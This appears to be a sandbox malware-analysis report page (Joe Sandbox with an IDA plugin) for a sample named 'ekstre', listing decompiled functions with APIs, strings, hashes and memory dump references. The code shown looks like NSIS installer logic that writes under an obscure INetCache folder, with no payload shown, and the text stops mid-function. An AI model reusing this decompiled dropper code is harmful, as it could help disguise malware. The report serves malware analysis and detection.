Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, "true", 0x4084d4, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed\\Buntmagersyers\\Mamelonation");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), "true");
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation
API String ID: 542301482-4273613624
Opcode ID: 79a76f17d064b27b583ad2c897dfdfca92600a627f8d5d4d29323073c3a9f57d
Instruction ID: a498918f0017c776c583d301c0d9889a109f513c08bb955c9b12fa31a6444d8a
Opcode Fuzzy Hash: 79a76f17d064b27b583ad2c897dfdfca92600a627f8d5d4d29323073c3a9f57d
Instruction Fuzzy Hash: 29411571A00209EFCF40DFE4C989E9D7BB5BF49308B2045AAF505EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x45e798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x45e798;
			}

0x004069a9
0x004069b2
0x00000000
0x004069bf
0x004069b5
0x00000000

APIs

FindFirstFileW.KERNELBASE(75D53420,0045E798,0045A750,00406088,0045A750,0045A750,00000000,0045A750,0045A750,75D53420,?,75D52EE0,00405D94,?,75D53420,75D52EE0), ref: 004069A9
FindClose.KERNELBASE(00000000), ref: 004069B5

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c32f58e4d31b2ef6d3786c7b8b69fce70f81a3369091677325aea235ed7fe711
Instruction ID: 0939914d34cf82b3cca468ead3a61b39ea3ddbd3f2cdf74c5f5b480a9345878f
Opcode Fuzzy Hash: c32f58e4d31b2ef6d3786c7b8b69fce70f81a3369091677325aea235ed7fe711
Instruction Fuzzy Hash: 9FD012B15182205FD34057386E0C84B7E989F163317258A36B8AAF11E0CB348C3697AC

Uniqueness

Uniqueness Score: -1.00%

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x446730 = _t34;
					if(_t130 == 0x110) {
						 *0x470268 = _t127;
						 *0x446744 = GetDlgItem(_t127, "true");
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x436710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x468248);
						 *0x46822c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x446730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x470280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x446730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x470284;
							if(_t38 ==  *0x470284) {
								E0040140B("true");
							}
							__eflags =  *0x46822c - _t136;
							if( *0x46822c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x470284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x4e9000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x4702ec - _t136;
							_v28 = _t48;
							if( *0x4702ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x436710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push("true");
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, "true");
							__eflags =  *0x4702ec - _t136;
							if( *0x4702ec == _t136) {
								_push( *0x446744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x436710);
							}
							E004045F9();
							E00406668(0x446748, E004040A6());
							E004066A5(0x446748, _t127, _t133,  &(0x446748[lstrlenW(0x446748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x446748); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x468238); // executed
									 *0x43e720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x470260,  *_t133 +  *0x468240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x468238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x468238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x46822c - _t136;
									if( *0x46822c != _t136) {
										goto L63;
									}
									ShowWindow( *0x468238, 8); // executed
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x4702ec - _t136;
								if( *0x4702ec != _t136) {
									goto L63;
								}
								__eflags =  *0x4702e0 - _t136;
								if( *0x4702e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x468238);
						 *0x470268 = _t136;
						EndDialog(_t127,  *0x43a718);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x468238, 0x40f, 0, "true");
						__eflags =  *0x46822c;
						return 0 |  *0x46822c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x446728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x468238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x4702ec - _t136;
											if( *0x4702ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x43a718 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x43a718 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x468238);
						 *0x468238 = _t122;
						L60:
						if( *0x456748 == _t136 &&  *0x468238 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x456748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x446728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x004040d0
0x004040d7
0x0040423e
0x00404242
0x00404246
0x00404248
0x0040424d
0x00404258
0x00404263
0x00404268
0x0040426a
0x0040426c
0x0040426f
0x00404274
0x00404282
0x0040428f
0x00404296
0x00404296
0x00404297
0x00404297
0x0040429c
0x004042a2
0x004042a9
0x004042af
0x004042b1
0x004042f1
0x004042f6
0x004042fb
0x004042fb
0x00404300
0x00404309
0x0040430b
0x00404310
0x00404316
0x0040431a
0x0040431a
0x0040431f
0x00404325
0x00000000
0x00000000
0x00404330
0x00404336
0x00000000
0x00000000
0x0040433f
0x00404347
0x0040434c
0x0040434f
0x00404355
0x0040435a
0x0040435d
0x00404363
0x00404368
0x0040436b
0x00404371
0x00404379
0x0040437f
0x00404385
0x00404389
0x00404390
0x00404390
0x00404390
0x0040439a
0x004043ac
0x004043b8
0x004043bd
0x004043c7
0x004043cd
0x004043cf
0x004043d4
0x004043d1
0x004043d1
0x004043d1
0x004043e4
0x004043fc
0x004043fe
0x00404404
0x00404419
0x00404406
0x0040440f
0x00404411
0x00404411
0x0040441f
0x00404430
0x00404446
0x0040444d
0x00404457
0x0040445c
0x0040445e
0x00000000
0x00404464
0x00404464
0x00404466
0x00000000
0x00000000
0x0040446c
0x00404470
0x00404495
0x0040449b
0x004044a1
0x004044a3
0x00000000
0x00000000
0x004044c9
0x004044cf
0x004044d1
0x004044d6
0x00000000
0x00000000
0x004044dc
0x004044df
0x004044e2
0x004044f9
0x00404505
0x0040451e
0x00404528
0x0040452d
0x00404533
0x00000000
0x00000000
0x0040453d
0x00404548
0x00000000
0x00404548
0x00404472
0x00404478
0x00000000
0x00000000
0x0040447e
0x00404484
0x00000000
0x00000000
0x00000000
0x0040448a
0x0040445e
0x00404555
0x00404561
0x00404568
0x00000000
0x004042b3
0x004042b3
0x004042b6
0x004042e9
0x004042e9
0x004042eb
0x00000000
0x00000000
0x00000000
0x004042eb
0x004042bc
0x004042c1
0x004042c3
0x00000000
0x00000000
0x004042d3
0x004042db
0x00000000
0x004042e1
0x004040e9
0x004040e9
0x004040ed
0x004040f2
0x00404101
0x00404101
0x00404107
0x0040410e
0x00404152
0x00404158
0x00404171
0x00404174
0x00404187
0x0040418d
0x00000000
0x00000000
0x00404193
0x0040419e
0x004041a0
0x004041a2
0x004041c1
0x004041c1
0x004041c4
0x004041c9
0x004041cc
0x004041dc
0x004041dd
0x004041df
0x00404215
0x00404225
0x00000000
0x00404225
0x004041e1
0x004041e7
0x00404200
0x00404205
0x00404207
0x00000000
0x00000000
0x00404209
0x004041f5
0x004041f5
0x004041f7
0x004041f7
0x00000000
0x004041f7
0x004041ea
0x004041ef
0x00000000
0x004041ef
0x004041ce
0x004041d4
0x00000000
0x00000000
0x004041d6
0x00000000
0x004041d6
0x004041c6
0x00000000
0x004041c6
0x004041ac
0x004041b3
0x004041b9
0x004041bb
0x00404591
0x00000000
0x00404591
0x00000000
0x004041bb
0x00404179
0x00000000
0x00404181
0x00404160
0x00404166
0x0040456e
0x00404574
0x00404581
0x00404587
0x00404587
0x00000000
0x00404110
0x00404115
0x00404121
0x0040412a
0x0040422b
0x00000000
0x00404149
0x0040414c
0x00000000
0x0040414c
0x0040412a
0x0040410e

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
ShowWindow.USER32(?), ref: 00404121
GetWindowLongW.USER32(?,000000F0), ref: 00404133
ShowWindow.USER32(?,00000004), ref: 0040414C
DestroyWindow.USER32 ref: 00404160
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
GetDlgItem.USER32(?,?), ref: 00404198
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
IsWindowEnabled.USER32(00000000), ref: 004041B3
GetDlgItem.USER32(?,?), ref: 0040425E
GetDlgItem.USER32(?,00000002), ref: 00404268
SetClassLongW.USER32(?,000000F2,?), ref: 00404282
SendMessageW.USER32(0000040F,00000000,?,?), ref: 004042D3
GetDlgItem.USER32(?,00000003), ref: 00404379
ShowWindow.USER32(00000000,?), ref: 0040439A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
EnableWindow.USER32(?,?), ref: 004043C7
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004043DD
EnableMenuItem.USER32(00000000), ref: 004043E4
SendMessageW.USER32(?,000000F4,00000000,?), ref: 004043FC
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
lstrlenW.KERNEL32(00446748,?,00446748,00000000), ref: 00404439
SetWindowTextW.USER32(?,00446748), ref: 0040444D
ShowWindow.USER32(?,0000000A), ref: 00404581

Strings

HgD, xrefs: 00404429

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: HgD
API String ID: 121052019-3670375811
Opcode ID: f0ca54b1b709ab7b6e06556346698c125ee57b0af9b2711805f2ee2a04c0cfa3
Instruction ID: e6ebe5c6d144bb258484d91c8d6910a5e475318fdd1ac2ca1aecf085551c263c
Opcode Fuzzy Hash: f0ca54b1b709ab7b6e06556346698c125ee57b0af9b2711805f2ee2a04c0cfa3
Instruction Fuzzy Hash: 15C1E5B1540604BBDB206F61ED89E2A3BA8FB85349F00057EF781B51F1CB795881DB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00403D17 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x470270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x446748;
					 *0x4d1000 = 0x30;
					 *0x4d1002 = 0x78;
					 *0x4d1004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x446748, 0);
					__eflags =  *0x446748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x446748, 0);
					}
					lstrcatW(0x4d1000, _t76);
				} else {
					E004065AF(0x4d1000,  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed";
				 *0x4702e0 =  *0x470278 & 0x00000020;
				 *0x4702fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x470260, 0x67, "true", 0, 0, 0x8040); // executed
					 *0x468248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x470300;
							if( *0x470300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B("true");
									goto L33;
								}
								__eflags =  *0x46822c;
								if( *0x46822c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x446728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x468200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x468200);
								 *0x468224 = _t87;
								RegisterClassW(0x468200);
							}
							_t44 = DialogBoxParamW( *0x470260,  *0x468240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), "true");
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x470260;
						 *0x468204 = E00401000;
						 *0x468210 =  *0x470260;
						 *0x468214 = _t30;
						 *0x468224 = 0x40a3b4;
						if(RegisterClassW(0x468200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x446728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x470260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x460200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x470298 + _t78 * 2,  *0x470298 +  *(_t82 + 0x4c) * 2, 0x460200, 0);
					_t63 =  *0x460200; // 0x43
